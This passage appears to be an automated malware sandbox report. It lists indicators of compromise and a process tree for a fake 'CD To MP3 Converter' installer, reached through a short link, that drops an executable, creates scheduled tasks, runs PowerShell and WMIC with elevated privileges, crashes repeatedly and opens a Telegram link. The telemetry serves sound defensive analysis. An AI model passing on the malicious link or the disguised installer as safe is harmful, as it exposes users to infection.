pid Process 6060 schtasks.exe 4332 schtasks.exe 1948 schtasks.exe 3096 schtasks.exe 2472 schtasks.exe 1472 schtasks.exe 1624 schtasks.exe 2868 schtasks.exe 32 schtasks.exe 4308 schtasks.exe 4868 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2020 msedge.exe 2020 msedge.exe 3120 msedge.exe 3120 msedge.exe 1924 msedge.exe 1924 msedge.exe 4344 identity_helper.exe 4344 identity_helper.exe 252 msedge.exe 252 msedge.exe 5284 setup_ZbRJIaBi46.tmp 5284 setup_ZbRJIaBi46.tmp 1928 cd2mp3converter32_64.exe 1928 cd2mp3converter32_64.exe 1928 cd2mp3converter32_64.exe 1928 cd2mp3converter32_64.exe 4192 msedge.exe 4192 msedge.exe 4192 msedge.exe 4192 msedge.exe 5140 powershell.exe 5140 powershell.exe 5140 powershell.exe 4768 powershell.exe 4768 powershell.exe 4768 powershell.exe 792 powershell.exe 792 powershell.exe 792 powershell.exe 1928 cd2mp3converter32_64.exe 1928 cd2mp3converter32_64.exe 3556 powershell.exe 3556 powershell.exe 3556 powershell.exe 3104 powershell.exe 3104 powershell.exe 3104 powershell.exe 4524 powershell.EXE 4524 powershell.EXE 4524 powershell.EXE 1928 cd2mp3converter32_64.exe 1928 cd2mp3converter32_64.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe 4544 powershell.exe 4544 powershell.exe 5200 DlrnvPY.exe 5200 DlrnvPY.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs
pid Process 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 5944 msedge.exe 5944 msedge.exe 5944 msedge.exe 5944 msedge.exe 5944 msedge.exe 5944 msedge.exe 5944 msedge.exe 5944 msedge.exe 5944 msedge.exe 5944 msedge.exe 5944 msedge.exe 5944 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5140 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 792 powershell.exe Token: SeIncreaseQuotaPrivilege 5144 WMIC.exe Token: SeSecurityPrivilege 5144 WMIC.exe Token: SeTakeOwnershipPrivilege 5144 WMIC.exe Token: SeLoadDriverPrivilege 5144 WMIC.exe Token: SeSystemProfilePrivilege 5144 WMIC.exe Token: SeSystemtimePrivilege 5144 WMIC.exe Token: SeProfSingleProcessPrivilege 5144 WMIC.exe Token: SeIncBasePriorityPrivilege 5144 WMIC.exe Token: SeCreatePagefilePrivilege 5144 WMIC.exe Token: SeBackupPrivilege 5144 WMIC.exe Token: SeRestorePrivilege 5144 WMIC.exe Token: SeShutdownPrivilege 5144 WMIC.exe Token: SeDebugPrivilege 5144 WMIC.exe Token: SeSystemEnvironmentPrivilege 5144 WMIC.exe Token: SeRemoteShutdownPrivilege 5144 WMIC.exe Token: SeUndockPrivilege 5144 WMIC.exe Token: SeManageVolumePrivilege 5144 WMIC.exe Token: 33 5144 WMIC.exe Token: 34 5144 WMIC.exe Token: 35 5144 WMIC.exe Token: 36 5144 WMIC.exe Token: SeIncreaseQuotaPrivilege 5144 WMIC.exe Token: SeSecurityPrivilege 5144 WMIC.exe Token: SeTakeOwnershipPrivilege 5144 WMIC.exe Token: SeLoadDriverPrivilege 5144 WMIC.exe Token: SeSystemProfilePrivilege 5144 WMIC.exe Token: SeSystemtimePrivilege 5144 WMIC.exe Token: SeProfSingleProcessPrivilege 5144 WMIC.exe Token: SeIncBasePriorityPrivilege 5144 WMIC.exe Token: SeCreatePagefilePrivilege 5144 WMIC.exe Token: SeBackupPrivilege 5144 WMIC.exe Token: SeRestorePrivilege 5144 WMIC.exe Token: SeShutdownPrivilege 5144 WMIC.exe Token: SeDebugPrivilege 5144 WMIC.exe Token: SeSystemEnvironmentPrivilege 5144 WMIC.exe Token: SeRemoteShutdownPrivilege 5144 WMIC.exe Token: SeUndockPrivilege 5144 WMIC.exe Token: SeManageVolumePrivilege 5144 WMIC.exe Token: 33 5144 WMIC.exe Token: 34 5144 WMIC.exe Token: 35 5144 WMIC.exe Token: 36 5144 WMIC.exe Token: SeDebugPrivilege 3556 powershell.exe Token: SeDebugPrivilege 3104 powershell.exe Token: SeDebugPrivilege 4524 powershell.EXE Token: SeDebugPrivilege 4544 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3752 WMIC.exe Token: SeIncreaseQuotaPrivilege 3752 WMIC.exe Token: SeSecurityPrivilege 3752 WMIC.exe Token: SeTakeOwnershipPrivilege 3752 WMIC.exe Token: SeLoadDriverPrivilege 3752 WMIC.exe Token: SeSystemtimePrivilege 3752 WMIC.exe Token: SeBackupPrivilege 3752 WMIC.exe Token: SeRestorePrivilege 3752 WMIC.exe Token: SeShutdownPrivilege 3752 WMIC.exe Token: SeSystemEnvironmentPrivilege 3752 WMIC.exe Token: SeUndockPrivilege 3752 WMIC.exe Token: SeManageVolumePrivilege 3752 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3752 WMIC.exe Token: SeIncreaseQuotaPrivilege 3752 WMIC.exe Token: SeSecurityPrivilege 3752 WMIC.exe -
Suspicious use of FindShellTrayWindow 43 IoCs
pid Process 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 5284 setup_ZbRJIaBi46.tmp 5944 msedge.exe -
Suspicious use of SendNotifyMessage 19 IoCs
pid Process 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe 3120 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3120 wrote to memory of 5504 3120 msedge.exe 81 PID 3120 wrote to memory of 5504 3120 msedge.exe 81 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 968 3120 msedge.exe 83 PID 3120 wrote to memory of 2020 3120 msedge.exe 84 PID 3120 wrote to memory of 2020 3120 msedge.exe 84 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85 PID 3120 wrote to memory of 700 3120 msedge.exe 85
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ify.ac/1Ic51⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xb8,0x10c,0x7ffa7e7e3cb8,0x7ffa7e7e3cc8,0x7ffa7e7e3cd82⤵PID:5504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1912 /prefetch:22⤵PID:968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2020
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:82⤵PID:700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:12⤵PID:4776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:12⤵PID:1244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5352 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:12⤵PID:1476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:12⤵PID:2068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:12⤵PID:3896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:12⤵PID:5072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5500 /prefetch:12⤵PID:2456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:12⤵PID:3560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:12⤵PID:336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:12⤵PID:3228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:12⤵PID:732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:252
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:12⤵PID:3852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3864 /prefetch:12⤵PID:2420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1236 /prefetch:12⤵PID:236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1904,12947359996342426571,11747806922874159933,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6828 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4192
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5532
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:912
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2192
-
C:\Users\Admin\Desktop\setup_ZbRJIaBi46.exe"C:\Users\Admin\Desktop\setup_ZbRJIaBi46.exe"1⤵PID:4964
-
C:\Users\Admin\AppData\Local\Temp\is-7CQA8.tmp\setup_ZbRJIaBi46.tmp"C:\Users\Admin\AppData\Local\Temp\is-7CQA8.tmp\setup_ZbRJIaBi46.tmp" /SL5="$502F2,6477394,56832,C:\Users\Admin\Desktop\setup_ZbRJIaBi46.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5284 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "cd_2_mp3-converter_7143"3⤵PID:716
-
-
C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe"C:\Users\Admin\AppData\Local\CD To MP3 Converter\cd2mp3converter32_64.exe" 3c5b5dd0a5373645b73425ca977c0fb33⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1928 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 8404⤵
- Program crash
PID:5616
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 8484⤵
- Program crash
PID:2120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 9244⤵
- Program crash
PID:2824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 10444⤵
- Program crash
PID:4188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 10644⤵
- Program crash
PID:5524
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 10924⤵
- Program crash
PID:5104
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 11524⤵
- Program crash
PID:2068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 10444⤵
- Program crash
PID:4576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 11604⤵
- Program crash
PID:1176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 11924⤵
- Program crash
PID:5848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 9644⤵
- Program crash
PID:4896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 13564⤵
- Program crash
PID:2708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 15844⤵
- Program crash
PID:1132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 11364⤵
- Program crash
PID:1912
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 9324⤵
- Program crash
PID:4920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16684⤵
- Program crash
PID:5884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20204⤵
- Program crash
PID:1916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://t.me/bboobies4⤵PID:2128
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa7e7e3cb8,0x7ffa7e7e3cc8,0x7ffa7e7e3cd85⤵PID:1772
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 17404⤵
- Program crash
PID:4932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 17324⤵
- Program crash
PID:3576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 17924⤵
- Program crash
PID:3028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16644⤵
- Program crash
PID:4448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 19364⤵
- Program crash
PID:2748
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16484⤵
- Program crash
PID:4860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20844⤵
- Program crash
PID:6100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20764⤵
- Program crash
PID:5860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21324⤵
- Program crash
PID:452
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18084⤵
- Program crash
PID:5240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21084⤵
- Program crash
PID:4796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18244⤵
- Program crash
PID:3496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 18084⤵
- Program crash
PID:4604
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 17404⤵
- Program crash
PID:5864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 20804⤵
- Program crash
PID:5684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 16764⤵
- Program crash
PID:5048
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 21484⤵
- Program crash
PID:804
-
-
